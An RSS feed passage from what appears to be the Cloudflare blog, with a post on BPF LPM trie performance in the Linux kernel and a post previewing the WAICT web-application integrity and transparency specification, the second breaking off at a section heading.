
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Tue, 07 Apr 2026 05:03:27 GMT</lastBuildDate>
        <item>
            <title><![CDATA[A deep dive into BPF LPM trie performance and optimization]]></title>
            <link>https://blog.cloudflare.com/a-deep-dive-into-bpf-lpm-trie-performance-and-optimization/</link>
            <pubDate>Tue, 21 Oct 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ This post explores the performance of BPF LPM tries, a critical data structure used for IP matching.  ]]></description>
            <content:encoded><![CDATA[ <p>It started with a mysterious soft lockup message in production. A single, cryptic line that led us down a rabbit hole into the performance of one of the most fundamental data structures we use: the BPF LPM trie.</p><p>BPF trie maps (<a href="https://docs.ebpf.io/linux/map-type/BPF_MAP_TYPE_LPM_TRIE/">BPF_MAP_TYPE_LPM_TRIE</a>) are heavily used for things like IP and IP+Port matching when routing network packets, ensuring your request passes through the right services before returning a result. The performance of this data structure is critical for serving our customers, but the speed of the current implementation leaves a lot to be desired. We’ve run into several bottlenecks when storing millions of entries in BPF LPM trie maps, such as entry lookup times taking hundreds of milliseconds to complete and freeing maps locking up a CPU for over 10 seconds. For instance, BPF maps are used when evaluating Cloudflare’s <a href="https://www.cloudflare.com/network-services/products/magic-firewall/"><u>Magic Firewall</u></a> rules and these bottlenecks have even led to traffic packet loss for some customers.</p><p>This post gives a refresher of how tries and prefix matching work, benchmark results, and a list of the shortcomings of the current BPF LPM trie implementation.</p>
    <div>
      <h2>A brief recap of tries</h2>
      <a href="#a-brief-recap-of-tries">
        
      </a>
    </div>
    <p>If it’s been a while since you last looked at the trie data structure (or if you’ve never seen it before), a trie is a tree data structure (similar to a binary tree) that lets you store and search for data by key, where each node stores some number of the key’s bits.</p><p>Searches are performed by traversing a path that essentially reconstructs the key, meaning nodes do not need to store their full key. This differs from a traditional binary search tree (BST) where the primary invariant is that the left child node has a key that is less than the current node and the right child has a key that is greater. BSTs require that each node store the full key so that a comparison can be made at each search step.</p><p>Here’s an example that shows how a BST might store values for the keys:</p><ul><li><p>ABC</p></li><li><p>ABCD</p></li><li><p>ABCDEFGH</p></li><li><p>DEF</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1uXt5qwpyq7VzrqxXlHFLj/99677afd73a98b9ce04d30209065499f/image4.png" />
          </figure><p>In comparison, a trie for storing the same set of keys might look like this.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3TfFZmwekNAF18yWlOIVWh/58396a19e053bd1c02734a6a54eea18e/image8.png" />
          </figure><p>This way of splitting out bits is really memory-efficient when you have redundancy in your data, e.g. prefixes are common in your keys, because that shared data only requires a single set of nodes. It’s for this reason that tries are often used to efficiently store strings, e.g. dictionaries of words – storing the strings “ABC” and “ABCD” doesn’t require 3 bytes + 4 bytes (assuming ASCII), it only requires 3 bytes + 1 byte because “ABC” is shared by both (the exact number of bits required in the trie is implementation dependent).</p><p>Tries also allow more efficient searching. For instance, if you wanted to know whether the key “CAR” existed in the BST you are required to go to the right child of the root (the node with key “DEF”) and check its left child because this is where it would live if it existed. A trie is more efficient because it searches in prefix order. In this particular example, a trie knows at the root whether that key is in the trie or not.</p><p>This design makes tries perfectly suited for performing longest prefix matches and for working with IP routing using CIDR. CIDR was introduced to make more efficient use of the IP address space (no longer requiring that classes fall into 4 buckets of 8 bits) but comes with added complexity because now the network portion of an IP address can fall anywhere. Handling the CIDR scheme in IP routing tables requires matching on the longest (most specific) prefix in the table rather than performing a search for an exact match.</p><p>If searching a trie does a single-bit comparison at each node, that’s a binary trie. If searching compares more bits we call that a <b><i>multibit trie</i></b>. 
You can store anything you like in a trie, including IP and subnet addresses – it’s all just ones and zeroes.</p><p>Nodes in multibit tries use more memory than in binary tries, but since computers operate on multibit words anyhow, it’s more efficient from a microarchitecture perspective to use multibit tries because you can traverse through the bits faster, reducing the number of comparisons you need to make to search for your data. It’s a classic space vs time tradeoff.</p><p>There are other optimisations we can use with tries. The distribution of data that you store in a trie might not be uniform and there could be sparsely populated areas. For example, if you store the strings “A” and “BCDEFGHI” in a multibit trie, how many nodes do you expect to use? If you’re using ASCII, you could construct the binary trie with a root node and branch left for “A” or right for “B”. With 8-bit nodes, you’d need another 7 nodes to store “C”, “D”, “E”, “F”, “G”, “H”, “I”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/LO6izFC5e06dRf9ra2roC/167ba5c4128fcebacc7b7a8eab199ea5/image5.png" />
          </figure><p>Since there are no other strings in the trie, that’s pretty suboptimal. Once you hit the first level after matching on “B” you know there’s only one string in the trie with that prefix, and you can avoid creating all the other nodes by using <b><i>path compression</i></b>. Path compression replaces nodes “C”, “D”, “E” etc. with a single one such as “I”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ADY3lNtF7NIgfUX7bX9vY/828a14e155d6530a4dc8cf3286ce8cc3/image13.png" />
          </figure><p>If you traverse the tree and hit “I”, you still need to compare the search key with the bits you skipped (“CDEFGH”) to make sure your search key matches the string. Exactly how and where you store the skipped bits is implementation dependent – BPF LPM tries simply store the entire key in the leaf node. As your data becomes denser, path compression is less effective.</p><p>What if your data distribution is dense and, say, all the first 3 levels in a trie are fully populated? In that case you can use <b><i>level compression</i></b><i> </i>and replace all the nodes in those levels with a single node that has 2**3 children. This is how Level-Compressed Tries work which are used for <a href="https://vincent.bernat.ch/en/blog/2017-ipv4-route-lookup-linux">IP route lookup</a> in the Linux kernel (see <a href="https://elixir.bootlin.com/linux/v6.12.43/source/net/ipv4/fib_trie.c"><u>net/ipv4/fib_trie.c</u></a>).</p><p>There are other optimisations too, but this brief detour is sufficient for this post because the BPF LPM trie implementation in the kernel doesn’t fully use the three we just discussed.</p>
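<p>To make longest-prefix matching concrete, here is a toy binary trie in Python: one node per key bit, no path or level compression, and no relation to the kernel’s C implementation. The prefixes and values are purely illustrative.</p>

```python
import ipaddress

class Node:
    __slots__ = ("children", "value")
    def __init__(self):
        self.children = [None, None]  # one child per bit: 0 and 1
        self.value = None             # set only if a prefix ends at this node

class BinaryLpmTrie:
    """Toy binary trie: one node per prefix bit, no compression."""
    def __init__(self):
        self.root = Node()

    def insert(self, cidr, value):
        net = ipaddress.ip_network(cidr)
        bits = int(net.network_address)
        node = self.root
        for i in range(net.prefixlen):
            b = (bits >> (31 - i)) & 1
            if node.children[b] is None:
                node.children[b] = Node()
            node = node.children[b]
        node.value = value

    def lookup(self, addr):
        """Return the value of the longest prefix covering addr, or None."""
        bits = int(ipaddress.ip_address(addr))
        node, best = self.root, None
        for i in range(32):
            if node.value is not None:
                best = node.value  # remember the longest match so far
            node = node.children[(bits >> (31 - i)) & 1]
            if node is None:
                break
        else:
            if node.value is not None:
                best = node.value
        return best

trie = BinaryLpmTrie()
trie.insert("10.0.0.0/8", "coarse")
trie.insert("10.1.0.0/16", "specific")
print(trie.lookup("10.1.2.3"))    # -> specific (the /16 beats the /8)
print(trie.lookup("10.9.9.9"))    # -> coarse (only the /8 matches)
print(trie.lookup("192.168.0.1")) # -> None (no prefix covers it)
```

Note how the search must keep walking past a matching prefix in case a longer one exists further down – exactly the property that distinguishes longest-prefix matching from an exact-match lookup.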
    <div>
      <h2>How fast are BPF LPM trie maps?</h2>
      <a href="#how-fast-are-bpf-lpm-trie-maps">
        
      </a>
    </div>
    <p>Here are some numbers from running <a href="https://lore.kernel.org/bpf/20250827140149.1001557-1-matt@readmodwrite.com/"><u>BPF selftests benchmark</u></a> on AMD EPYC 9684X 96-Core machines. Here the trie has 10K entries, a 32-bit prefix length, and an entry for every key in the range [0, 10K).</p><table><tr><td><p>Operation</p></td><td><p>Throughput</p></td><td><p>Stddev</p></td><td><p>Latency</p></td></tr><tr><td><p>lookup</p></td><td><p>7.423M ops/s</p></td><td><p>0.023M ops/s</p></td><td><p>134.710 ns/op</p></td></tr><tr><td><p>update</p></td><td><p>2.643M ops/s</p></td><td><p>0.015M ops/s</p></td><td><p>378.310 ns/op</p></td></tr><tr><td><p>delete</p></td><td><p>0.712M ops/s</p></td><td><p>0.008M ops/s</p></td><td><p>1405.152 ns/op</p></td></tr><tr><td><p>free</p></td><td><p>0.573K ops/s</p></td><td><p>0.574K ops/s</p></td><td><p>1.743 ms/op</p></td></tr></table><p>The time to free a BPF LPM trie with 10K entries is noticeably large. We recently ran into an issue where this took so long that it caused <a href="https://lore.kernel.org/lkml/20250616095532.47020-1-matt@readmodwrite.com/"><u>soft lockup messages</u></a> to spew in production.</p><p>This benchmark gives some idea of worst case behaviour. Since the keys are so densely populated, path compression is completely ineffective. In the next section, we explore the lookup operation to understand the bottlenecks involved.</p>
    <div>
      <h2>Why are BPF LPM tries slow?</h2>
      <a href="#why-are-bpf-lpm-tries-slow">
        
      </a>
    </div>
    <p>The LPM trie implementation in <a href="https://elixir.bootlin.com/linux/v6.12.43/source/kernel/bpf/lpm_trie.c"><u>kernel/bpf/lpm_trie.c</u></a> has a couple of the optimisations we discussed in the introduction. It is capable of multibit comparisons at leaf nodes, but since there are only two child pointers in each internal node, if your tree is densely populated with a lot of data that only differs by one bit, these multibit comparisons degrade into single bit comparisons.</p><p>Here’s an example. Suppose you store the numbers 0, 1, and 3 in a BPF LPM trie. You might hope that since these values fit in a single 32 or 64-bit machine word, you could use a single comparison to decide which next node to visit in the trie. But that’s only possible if your trie implementation has 3 child pointers in the current node (which, to be fair, most trie implementations do). In other words, you want to make a 3-way branching decision but since BPF LPM tries only have two children, you’re limited to a 2-way branch.</p><p>A diagram for this 2-child trie is given below.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ciL2t6aMyJHR2FfX41rNk/365abe47cf384729408cf9b98c65c0be/image9.png" />
          </figure><p>The leaf nodes are shown in green with the key, as a binary string, in the center. Even though a single 8-bit comparison is more than capable of figuring out which node has that key, the BPF LPM trie implementation resorts to inserting intermediate nodes (blue) to inject 2-way branching decisions into your path traversal because its parent (the orange root node in this case) only has 2 children. Once you reach a leaf node, BPF LPM tries can perform a multibit comparison to check the key. If a node supported pointers to more children, the above trie could instead look like this, allowing a 3-way branch and reducing the lookup time.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17VoWl8OY6tzcARKDKuSjS/b9200dbeddf13f101b7085a549742f95/image3.png" />
          </figure><p>This 2-child design impacts the height of the trie. In the worst case, a completely full trie essentially becomes a binary search tree with height log2(nr_entries) and the height of the trie impacts how many comparisons are required to search for a key.</p><p>The above trie also shows how BPF LPM tries implement a form of path compression – you only need to insert an intermediate node where you have two nodes whose keys differ by a single bit. If instead of 3, you insert a key of 15 (0b1111), this won’t change the layout of the trie; you still only need a single node at the right child of the root.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ecfKSeoqN3bfBXmC9KHw5/3be952edea34d6b2cc867ba31ce14805/image12.png" />
          </figure><p>And finally, BPF LPM tries do not implement level compression. Again, this stems from the fact that nodes in the trie can only have 2 children. IP route tables tend to have many prefixes in common and you typically see densely packed tries at the upper levels which makes level compression very effective for tries containing IP routes.</p><p>Here’s a graph showing how the lookup throughput for LPM tries (measured in million ops/sec) degrades as the number of entries increases, from 1 entry up to 100K entries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33I92exrEZTcUWOjxaBOqY/fb1de551b06e3272c8670d0117d738fa/image2.png" />
          </figure><p>Once you reach 1 million entries, throughput is around 1.5 million ops/sec, and continues to fall as the number of entries increases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4OhaAaI5Y2XJCofI9V39z/567a01b3335f29ef3b46ccdd74dc27e5/image1.png" />
          </figure><p>Why is this? Initially, the bottleneck is the L1 dcache miss rate: every node traversed in the trie is a potential cache miss.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Gx4fOLKmhUKHegybQU7sl/4936239213f0061d5cbc2f5d6b63fde6/image11.png" />
          </figure><p>As you can see from the graph, L1 dcache miss rate remains relatively steady and yet the throughput continues to decline. At around 80K entries, dTLB miss rate becomes the bottleneck.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Jy7aTN3Nyo2EsbSzw313n/d26871fa417ffe293adb47fe7f7dc56b/image7.png" />
          </figure><p>Because BPF LPM tries dynamically allocate individual nodes from a freelist of kernel memory, these nodes can live at arbitrary addresses, which means traversing a path through a trie will almost certainly incur cache misses and potentially dTLB misses. This gets worse as the number of entries, and the height of the trie, increases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6CB3MvSvSgH1T2eY7Xlei8/81ebe572592ca71529d79564a88993f0/image10.png" />
          </figure>
    <div>
      <h2>Where do we go from here?</h2>
      <a href="#where-do-we-go-from-here">
        
      </a>
    </div>
    <p>By understanding the current limitations of the BPF LPM trie, we can now work towards building a more performant and efficient solution for the future of the Internet.</p><p>We’ve already contributed these benchmarks to the upstream Linux kernel — but that’s only the start. We have plans to improve the performance of BPF LPM tries, particularly the lookup function, which is heavily used for our workloads. This post covered a number of optimisations that are already used by the <a href="https://elixir.bootlin.com/linux/v6.12.43/source/net/ipv4/fib_trie.c"><u>net/ipv4/fib_trie.c</u></a> code, so a natural first step is to refactor that code so that a common Level Compressed trie implementation can be used. Expect future blog posts to explore this work in depth.</p><p>If you’re interested in looking at more performance numbers, <a href="https://wiki.cfdata.org/display/~jesper">Jesper Brouer</a> has recorded some here: <a href="https://github.com/xdp-project/xdp-project/blob/main/areas/bench/bench02_lpm-trie-lookup.org">https://github.com/xdp-project/xdp-project/blob/main/areas/bench/bench02_lpm-trie-lookup.org</a>.</p><h6><i>If the Linux kernel, performance, or optimising data structures excites you, </i><a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering&amp;location=default"><i>our engineering teams are hiring</i></a><i>.</i></h6> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[eBPF]]></category>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Performance]]></category>
            <guid isPermaLink="false">2A4WHjTqyxprwUMPaZ6tfj</guid>
            <dc:creator>Matt Fleming</dc:creator>
            <dc:creator>Jesper Brouer</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improving the trustworthiness of Javascript on the Web]]></title>
            <link>https://blog.cloudflare.com/improving-the-trustworthiness-of-javascript-on-the-web/</link>
            <pubDate>Thu, 16 Oct 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ There's no way to audit a site’s client-side code as it changes, making it hard to trust sites that use cryptography. We preview a specification we co-authored that adds auditability to the web. ]]></description>
            <content:encoded><![CDATA[ <p>The web is the most powerful application platform in existence. As long as you have the <a href="https://developer.mozilla.org/en-US/docs/Web/API"><u>right API</u></a>, you can safely run anything you want in a browser.</p><p>Well… anything but cryptography.</p><p>It is as true today as it was in 2011 that <a href="https://web.archive.org/web/20200731144044/https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2011/august/javascript-cryptography-considered-harmful/"><u>Javascript cryptography is Considered Harmful</u></a>. The main problem is code distribution. Consider an end-to-end-encrypted messaging web application. The application generates <a href="https://www.cloudflare.com/learning/ssl/what-is-a-cryptographic-key/"><u>cryptographic keys</u></a> in the client’s browser that let users view and send <a href="https://en.wikipedia.org/wiki/End-to-end_encryption"><u>end-to-end encrypted</u></a> messages to each other. If the application is compromised, what would stop the malicious actor from simply modifying their Javascript to exfiltrate messages?</p><p>It is interesting to note that smartphone apps don’t have this issue. This is because app stores do a lot of heavy lifting to provide security for the app ecosystem. Specifically, they provide <b>integrity</b>, ensuring that apps being delivered are not tampered with, <b>consistency</b>, ensuring all users get the same app, and <b>transparency</b>, ensuring that the record of versions of an app is truthful and publicly visible.</p><p>It would be nice if we could get these properties for our end-to-end encrypted web application, and the web as a whole, without requiring a single central authority like an app store. Further, such a system would benefit all in-browser uses of cryptography, not just end-to-end-encrypted apps. 
For example, many web-based confidential <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/"><u>LLMs</u></a>, cryptocurrency wallets, and voting systems use in-browser Javascript cryptography for the last step of their verification chains.</p><p>In this post, we will provide an early look at such a system, called <a href="https://github.com/beurdouche/explainers/blob/main/waict-explainer.md"><u>Web Application Integrity, Consistency, and Transparency</u></a> (WAICT) that we have helped author. WAICT is a <a href="https://www.w3.org/"><u>W3C</u></a>-backed effort among browser vendors, cloud providers, and encrypted communication developers to bring stronger security guarantees to the entire web. We will discuss the problem we need to solve, and build up to a solution resembling the <a href="https://github.com/rozbb/draft-waict-transparency"><u>current transparency specification draft</u></a>. We hope to build even wider consensus on the solution design in the near future.</p>
    <div>
      <h2>Defining the Web Application</h2>
      <a href="#defining-the-web-application">
        
      </a>
    </div>
    <p>In order to talk about security guarantees of a web application, it is first necessary to define precisely what the application <i>is</i>. A smartphone application is essentially just a zip file. But a website is made up of interlinked assets, including HTML, Javascript, WASM, and CSS, that can each be locally or externally hosted. Further, if any asset changes, it could drastically change the functioning of the application. A coherent definition of an application thus requires the application to commit to precisely the assets it loads. This is done using integrity features, which we describe now.</p>
    <div>
      <h3>Subresource Integrity</h3>
      <a href="#subresource-integrity">
        
      </a>
    </div>
    <p>An important building block for defining a single coherent application is <b>subresource integrity</b> (SRI). SRI is a feature built into most browsers that permits a website to specify the cryptographic hash of external resources, e.g.,</p>
            <pre><code>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.13.7/underscore-min.js" integrity="sha512-dvWGkLATSdw5qWb2qozZBRKJ80Omy2YN/aF3wTUVC5+D1eqbA+TjWpPpoj8vorK5xGLMa2ZqIeWCpDZP/+pQGQ=="&gt;&lt;/script&gt;</code></pre>
            <p>This causes the browser to fetch <code>underscore.js</code> from <code>cdnjs.cloudflare.com</code> and verify that its SHA-512 hash matches the given hash in the tag. If they match, the script is loaded. If not, an error is thrown and nothing is executed.</p><p>If every external script, stylesheet, etc. on a page comes with an SRI integrity attribute, then the whole page is defined by just its HTML. This is close to what we want, but a web application can consist of many pages, and there is no way for a page to enforce the hash of the pages it links to.</p>
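<p>An <code>integrity</code> value like the one above is just the name of the hash algorithm plus the base64-encoded digest of the file. A minimal sketch of computing one in Python (the inline asset bytes here are purely illustrative; in practice you would read the script file from disk):</p>

```python
import base64
import hashlib

def sri_hash(data: bytes, alg: str = "sha512") -> str:
    """Compute a Subresource Integrity value: '<alg>-<base64 digest>'."""
    digest = hashlib.new(alg, data).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"

# Hypothetical inline asset; a real invocation might hash
# open("underscore-min.js", "rb").read() instead.
print(sri_hash(b"console.log('hello');"))
```

If the fetched bytes change by even one bit, the recomputed digest no longer matches the attribute and the browser refuses to load the script.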
    <div>
      <h3>Integrity Manifest</h3>
      <a href="#integrity-manifest">
        
      </a>
    </div>
    <p>We would like to have a way of enforcing integrity on an entire site, i.e., every asset under a domain. For this, WAICT defines an <b>integrity manifest</b>, a configuration file that websites can provide to clients. One important item in the manifest is the <b>asset hashes dictionary</b>, which maps the hash of each asset the browser might load from that domain to that asset’s path. Assets that may occur at any path, e.g., an error page, map to the empty string:</p>
            <pre><code>"hashes": {
  "81db308d0df59b74d4a9bd25c546f25ec0fdb15a8d6d530c07a89344ae8eeb02": "/assets/js/main.js",
  "fbd1d07879e672fd4557a2fa1bb2e435d88eac072f8903020a18672d5eddfb7c": "/index.html",
  "5e737a67c38189a01f73040b06b4a0393b7ea71c86cf73744914bbb0cf0062eb": "/vendored/main.css",
  "684ad58287ff2d085927cb1544c7d685ace897b6b25d33e46d2ec46a355b1f0e": "",
  "f802517f1b2406e308599ca6f4c02d2ae28bb53ff2a5dbcddb538391cb6ad56a": ""
}
</code></pre>
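<p>A site operator could generate such a dictionary by hashing every file under the site root. A sketch, assuming (as the example above suggests) hex-encoded SHA-256 digests; the directory layout is hypothetical:</p>

```python
import hashlib
from pathlib import Path

def build_asset_hashes(root: str) -> dict:
    """Map hex SHA-256 digest -> site-relative path for every file under root."""
    hashes = {}
    base = Path(root)
    for path in sorted(base.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            hashes[digest] = "/" + path.relative_to(base).as_posix()
    return hashes
```

Catch-all entries such as the error page above would then be added with an empty-string path.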
            <p>The other main component of the manifest is the <b>integrity policy</b>, which tells the browser which data types are being enforced and how strictly. For example, the policy in the manifest below will:</p><ol><li><p>Reject any script before running it, if it’s missing an SRI tag and doesn’t appear in the hashes</p></li><li><p>Reject any WASM that’s missing an SRI tag and doesn’t appear in the hashes, though possibly only after it has started running</p></li></ol>
            <pre><code>"integrity-policy": "blocked-destinations=(script), checked-destinations=(wasm)"</code></pre>
            <p>Put together, these make up the integrity manifest:</p>
            <pre><code>"manifest": {
  "version": 1,
  "integrity-policy": ...,
  "hashes": ...
}
</code></pre>
            <p>Thus, when both SRI and integrity manifests are used, the entire site and its interpretation by the browser are uniquely determined by the hash of the integrity manifest. This is exactly what we wanted. We have distilled the problem of endowing a web application with authenticity, consistent distribution, and the rest to the problem of endowing a single hash with those same properties.</p>
    <div>
      <h2>Achieving Transparency</h2>
      <a href="#achieving-transparency">
        
      </a>
    </div>
    <p>Recall, a transparent web application is one whose code is stored in a publicly accessible, append-only log. This is helpful in two ways: 1) if a user is served malicious code and they learn about it, there is a public record of the code they ran, and so they can prove it to external parties, and 2) if a user is served malicious code and they don’t learn about it, there is still a chance that an external auditor may comb through the historical web application code and find the malicious code anyway. Of course, transparency does not help detect malicious code or even prevent its distribution, but it at least makes it <i>publicly auditable</i>.</p><p>Now that we have a single hash that commits to an entire website’s contents, we can talk about ensuring that that hash ends up in a public log. We have several important requirements here:</p><ol><li><p><b>Do not break existing sites.</b> This one is a given. Whatever system gets deployed, it should not interfere with the correct functioning of existing websites. Participation in transparency should be strictly opt-in.</p></li><li><p><b>No added round trips.</b> Transparency should not cause extra network round trips between the client and the server. Otherwise there will be a network latency penalty for users who want transparency.</p></li><li><p><b>User privacy.</b> A user should not have to identify themselves to any party more than they already do. That means no connections to new third parties, and no sending identifying information to the website.</p></li><li><p><b>User statelessness.</b> A user should not have to store site-specific data. We do not want solutions that rely on storing or gossiping per-site cryptographic information.</p></li><li><p><b>Non-centralization.</b> There should not be a single point of failure in the system—if any single party experiences downtime, the system should still be able to make progress. 
Similarly, there should be no single point of trust—if a user distrusts any single party, the user should still receive all the security benefits of the system.</p></li><li><p><b>Ease of opt-in.</b> The barrier of entry for transparency should be as low as possible. A site operator should be able to start logging their site cheaply and without being an expert.</p></li><li><p><b>Ease of opt-out.</b> It should be easy for a website to stop participating in transparency. Further, to avoid accidental lock-in like the <a href="https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning#Criticism_and_decline"><u>defunct HPKP spec</u></a>, it should be possible for this to happen even if all cryptographic material is lost, e.g., in the seizure or selling of a domain.</p></li><li><p><b>Opt-out is transparent.</b> As described before, because transparency is optional, it is possible for an attacker to disable the site’s transparency, serve malicious content, then enable transparency again. We must make sure this kind of attack is detectable, i.e., the act of disabling transparency must itself be logged somewhere.</p></li><li><p><b>Monitorability.</b> A website operator should be able to efficiently monitor the transparency information being published about their website. In particular, they should not have to run a high-network-load, always-on program just to notify them if their site has been hijacked.</p></li></ol><p>With these requirements in place, we can move on to construction. We introduce a data structure that will be essential to the design.</p>
    <div>
      <h3>Hash Chain</h3>
      <a href="#hash-chain">
        
      </a>
    </div>
    <p>Almost everything in transparency is an append-only log, i.e., a data structure that acts like a list and has the ability to produce an <b>inclusion proof</b>, i.e., a proof that an element occurs at a particular index in the list; and a <b>consistency proof</b>, i.e., a proof that a list is an extension of a previous version of the list. A consistency proof between two lists demonstrates that no elements were modified or deleted, only added.</p><p>The simplest possible append-only log is a <b>hash chain</b>, a list-like data structure wherein each subsequent element is hashed into the running <i>chain hash</i>. The final chain hash is a succinct representation of the entire list.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nVcIeoKTYEd0hydT9jdpj/fd90a78cba46c1893058a7ff40a42fac/BLOG-2875_2.png" />
          </figure><p><sub>A hash chain. The green nodes represent the </sub><sub><i>chain hash</i></sub><sub>, i.e., the hash of the element below it, concatenated with the previous chain hash. </sub></p><p>The proof structures are quite simple. To prove inclusion of the element at index <code>i</code>, the prover provides the chain hash before <code>i</code>, and all the elements after <code>i</code>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7tYbCRVVTV3osE3lWs8YjG/be76d6022420ffa3d78b0180ef69bb1a/BLOG-2875_3.png" />
          </figure><p><sub>Proof of inclusion for the second element in the hash chain. The verifier knows only the final chain hash. It checks equality of the final computed chain hash with the known final chain hash. The light green nodes represent hashes that the verifier computes. </sub></p><p>Similarly, to prove consistency between the chains of size <code>i</code> and <code>j</code>, the prover provides the elements between <code>i</code> and <code>j</code>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rR4DMJIVxNxePI6DARtFD/e9da2930043864a4add3a74b699535d6/BLOG-2875_4.png" />
          </figure><p><sub>Proof of consistency of the chain of size one and chain of size three. The verifier has the chain hashes from the starting and ending chains. It checks equality of the final computed chain hash with the known ending chain hash. The light green nodes represent hashes that the verifier computes. </sub></p>
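<p>The chain hash and both proofs can be sketched in a few lines of Python. This is a toy model of the structure in the figures above (SHA-256 with an all-zero initial chain hash), not the actual WAICT encoding:</p>

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def chain_hash(elements: list) -> bytes:
    """Fold each element into a running chain hash."""
    acc = b"\x00" * 32  # initial chain hash
    for e in elements:
        acc = h(acc + h(e))
    return acc

def prove_inclusion(elements: list, i: int):
    """Chain hash before index i, plus the elements from i onward."""
    return chain_hash(elements[:i]), elements[i:]

def verify_inclusion(final_hash: bytes, proof, element: bytes) -> bool:
    prefix_hash, tail = proof
    if not tail or tail[0] != element:
        return False
    acc = prefix_hash
    for e in tail:  # recompute the chain hash from the proof
        acc = h(acc + h(e))
    return acc == final_hash

def verify_consistency(old_hash: bytes, new_hash: bytes, added: list) -> bool:
    """Check that the new chain extends the old one by exactly `added`."""
    acc = old_hash
    for e in added:
        acc = h(acc + h(e))
    return acc == new_hash

log = [b"manifest-v1", b"manifest-v2", b"manifest-v3"]
final = chain_hash(log)
assert verify_inclusion(final, prove_inclusion(log, 1), b"manifest-v2")
assert verify_consistency(chain_hash(log[:1]), final, log[1:])
```

Note that both checks end the same way: recompute the final chain hash from the supplied material and compare it against the hash the verifier already trusts.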
    <div>
      <h3>Building Transparency</h3>
      <a href="#building-transparency">
        
      </a>
    </div>
    <p>We can use hash chains to build a transparency scheme for websites.</p>
    <div>
      <h4>Per-Site Logs</h4>
      <a href="#per-site-logs">
        
      </a>
    </div>
    <p>As a first step, let’s give every site its own log, instantiated as a hash chain (we will discuss how these all come together into one big log later). The items of the log are just the manifest of the site at a particular point in time:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/35o9mKoVPkOExKRFHRgWTu/305d589e0a584a3200670aab5b060c2b/BLOG-2875_5.png" />
          </figure><p><sub>A site’s hash chain-based log, containing three historical manifests. </sub></p><p>In reality, the log does not store the manifest itself, but the manifest hash. Sites designate an <b>asset host</b> that knows how to map hashes to the data they reference. This is a content-addressable storage backend, and can be implemented using strongly cached static hosting solutions.</p><p>A log on its own is not very trustworthy. Whoever runs the log can add and remove elements at will and then recompute the hash chain. To maintain the append-only-ness of the chain, we designate a trusted third party, called a <b>witness</b>. Given a hash chain consistency proof and a new chain hash, a witness:</p><ol><li><p>Verifies the consistency proof with respect to its old stored chain hash, and the new provided chain hash.</p></li><li><p>If successful, signs the new chain hash along with a signature timestamp.</p></li></ol><p>Now, when a user navigates to a website with transparency enabled, the sequence of events is:</p><ol><li><p>The site serves its manifest, an inclusion proof showing that the manifest appears in the log, and all the signatures from all the witnesses who have validated the log chain hash.</p></li><li><p>The browser verifies the signatures from whichever witnesses it trusts.</p></li><li><p>The browser verifies the inclusion proof. The manifest must be the newest entry in the chain (we discuss how to serve old manifests later).</p></li><li><p>The browser proceeds with the usual manifest and SRI integrity checks.</p></li></ol><p>At this point, the user knows that the given manifest has been recorded in a log whose chain hash has been saved by a trustworthy witness, so they can be reasonably sure that the manifest won’t be removed from history. 
Further, assuming the asset host functions correctly, the user knows that a copy of all the received code is readily available.</p><p><b>The need to signal transparency.</b> The above algorithm works, but we have a problem: if an attacker takes control of a site, they can simply stop serving transparency information and thus implicitly disable transparency without detection. So we need an explicit mechanism that keeps track of every website that has enrolled into transparency.</p>
    <div>
      <h3>The Transparency Service</h3>
      <a href="#the-transparency-service">
        
      </a>
    </div>
